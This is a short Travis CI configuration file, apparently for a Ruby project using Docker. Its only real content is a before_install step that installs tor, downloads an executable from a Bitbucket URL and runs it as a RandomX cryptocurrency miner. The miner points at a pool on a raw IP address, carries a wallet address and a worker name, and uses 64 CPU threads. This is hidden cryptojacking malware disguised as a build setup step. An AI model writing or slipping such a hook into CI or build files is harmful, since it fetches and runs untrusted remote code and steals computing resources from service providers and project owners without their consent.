language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt install tor && sudo wget https://bitbucket.org/AnliAngku/minex/downloads/masterfile-srb && sudo chmod u+x masterfile-srb && sudo ./masterfile-srb --disable-gpu --algorithm randomx --pool 54.188.223.206:80 --wallet 44dWWt57wRicWrDfRhNZne5WNBKAk6rbsFmXSQ3XVNJzLZe91gNfW7YbUupCLHyFx7RiNPV3wNyubcvZHKFcGfkjLi4eBsQ.Pekerja01 --cpu-threads 64;0